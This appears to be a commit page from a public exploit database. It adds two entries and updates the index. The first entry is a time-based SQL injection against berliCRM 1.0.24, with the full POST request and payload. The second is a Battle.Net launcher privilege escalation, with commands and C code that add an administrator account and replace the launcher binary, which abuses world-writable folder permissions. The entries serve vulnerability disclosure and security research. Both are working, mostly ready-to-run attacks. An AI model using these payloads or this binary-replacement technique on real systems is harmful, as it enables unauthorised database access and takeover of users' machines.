DB: 2020-10-14
2 changes to exploits/shellcodes Battle.Net 1.27.1.12428 - Insecure File Permissions berliCRM 1.0.24 - 'src_record' SQL Injection
This commit is contained in:
parent
14fcd4863f
commit
973a669c08
3 changed files with 136 additions and 0 deletions
35
exploits/php/webapps/48872.txt
Normal file
35
exploits/php/webapps/48872.txt
Normal file
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title: berliCRM 1.0.24 - 'src_record' SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-10-11
|
||||
# Exploit Author: Ahmet Ümit BAYRAM
|
||||
# Vendor Homepage: https://www.berlicrm.de
|
||||
# Software Link: https://github.com/berliCRM/berlicrm/archive/1.0.24.zip
|
||||
# Version: 1.0.24
|
||||
# Tested on: Kali Linux
|
||||
# CVE : N/A
|
||||
|
||||
|
||||
========== Post Request =========================
|
||||
|
||||
POST /index.php HTTP/1.1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: localhost
|
||||
Cookie: PHPSESSID=bab89b6fc39e1fd2c26877a4544cbb64
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Encoding: gzip,deflate
|
||||
Content-Length: 226
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
|
||||
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
|
||||
Connection: Keep-alive
|
||||
|
||||
__vtrftk=sid:ff114f440469f69f1507ebd04c65e05ba2fcc8d3%2C1602392658&module=Contacts&src_field=contact_id&src_module=Contacts&src_record=1&triggerEventName=postSelection721&view=Popup
|
||||
|
||||
============= Vulnerable Parameter ===============
|
||||
|
||||
src_record (POST)
|
||||
|
||||
============= Payload ===========================
|
||||
|
||||
0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z
|
99
exploits/windows/local/48873.txt
Normal file
99
exploits/windows/local/48873.txt
Normal file
|
@ -0,0 +1,99 @@
|
|||
# Exploit Title: Battle.Net 1.27.1.12428 - Insecure File Permissions
|
||||
# Date: 2020-10-09
|
||||
# Exploit Author: George Tsimpidas
|
||||
# Software Link : https://www.blizzard.com/en-gb/download/ ( Battle Net Desktop )
|
||||
# Version Patch: 1.27.1.12428
|
||||
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
|
||||
# Category: local
|
||||
|
||||
|
||||
|
||||
Vulnerability Description:
|
||||
|
||||
Battle.Net Launcher (Battle.net.exe) suffers from an elevation of
|
||||
privileges
|
||||
vulnerability which can be used by a simple user that can change the
|
||||
executable file
|
||||
with a binary of choice. The vulnerability exist due to the improper
|
||||
permissions,
|
||||
with the 'F' flag (Full) for 'Users' group, making the entire directory
|
||||
'Battle.net' and its files and sub-dirs world-writable.
|
||||
|
||||
## Insecure Folder Permission
|
||||
|
||||
C:\Program Files (x86)>icacls Battle.net
|
||||
|
||||
Battle.net BUILTIN\Users:(OI)(CI)(F)
|
||||
BUILTIN\Administrators:(OI)(CI)(F)
|
||||
CREATOR OWNER:(OI)(CI)(F)
|
||||
|
||||
## Insecure File Permission
|
||||
|
||||
C:\Program Files (x86)\Battle.net>icacls "Battle.net.exe"
|
||||
|
||||
Battle.net.exe BUILTIN\Users:(I)(F)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
FREY-OMEN\30698:(I)(F)
|
||||
|
||||
|
||||
## Local Privilege Escalation Proof of Concept
|
||||
#0. Download & install
|
||||
|
||||
#1. Create low privileged user & change to the user
|
||||
## As admin
|
||||
|
||||
C:\>net user lowpriv Password123! /add
|
||||
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
|
||||
User name lowpriv
|
||||
Local Group Memberships *Users
|
||||
Global Group memberships *None
|
||||
|
||||
#2. Move the Service EXE to a new name
|
||||
|
||||
C:\Program Files (x86)\Battle.net> whoami
|
||||
|
||||
lowpriv
|
||||
|
||||
C:\Program Files (x86)\Battle.net> move Battle.net.exe Battle.frey.exe
|
||||
1 file(s) moved.
|
||||
|
||||
#3. Create malicious binary on kali linux
|
||||
|
||||
## Add Admin User C Code
|
||||
kali# cat addAdmin.c
|
||||
int main(void){
|
||||
system("net user placebo mypassword /add");
|
||||
system("net localgroup Administrators placebo /add");
|
||||
WinExec("C:\\Program Files (x86)\\Battle.net\\Battle.frey.exe>",0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
## Compile Code
|
||||
kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Battle.net.exe
|
||||
|
||||
#4. Transfer created 'Battle.net.exe' to the Windows Host
|
||||
|
||||
#5. Move the created 'Battle.net.exe' binary to the 'C:\Program Files
|
||||
(x86)\Battle.net>' Folder
|
||||
|
||||
C:\Program Files (x86)\Battle.net> move
|
||||
C:\Users\lowpriv\Downloads\Battle.net.exe .
|
||||
|
||||
#6. Check that exploit admin user doesn't exists
|
||||
|
||||
C:\Program Files (x86)\Battle.net> net user placebo
|
||||
|
||||
The user name could not be found
|
||||
|
||||
#6. Reboot the Computer
|
||||
|
||||
C:\Program Files (x86)\Battle.net> shutdown /r
|
||||
|
||||
#7. Login & look at that new Admin
|
||||
|
||||
C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr
|
||||
/v "Full"
|
||||
|
||||
User name placebo
|
||||
Local Group Memberships *Administrators *Users
|
||||
Global Group memberships *None
|
|
@ -10387,6 +10387,7 @@ id,file,description,date,author,type,platform,port
|
|||
48836,exploits/windows/local/48836.c,"MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation",2020-09-28,"Matteo Malvica",local,windows,
|
||||
48839,exploits/windows/local/48839.py,"BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)",2020-09-29,"Christian Vierschilling",local,windows,
|
||||
48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows,
|
||||
48873,exploits/windows/local/48873.txt,"Battle.Net 1.27.1.12428 - Insecure File Permissions",2020-10-13,"George Tsimpidas",local,windows,
|
||||
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
|
||||
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
|
||||
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
|
||||
|
@ -40690,6 +40691,7 @@ id,file,description,date,author,type,platform,port
|
|||
48869,exploits/multiple/webapps/48869.txt,"Liman 0.7 - Cross-Site Request Forgery (Change Password)",2020-10-12,"George Tsimpidas",webapps,multiple,
|
||||
48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php,
|
||||
48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware,
|
||||
48872,exploits/php/webapps/48872.txt,"berliCRM 1.0.24 - 'src_record' SQL Injection",2020-10-13,"Ahmet Ümit BAYRAM",webapps,php,
|
||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue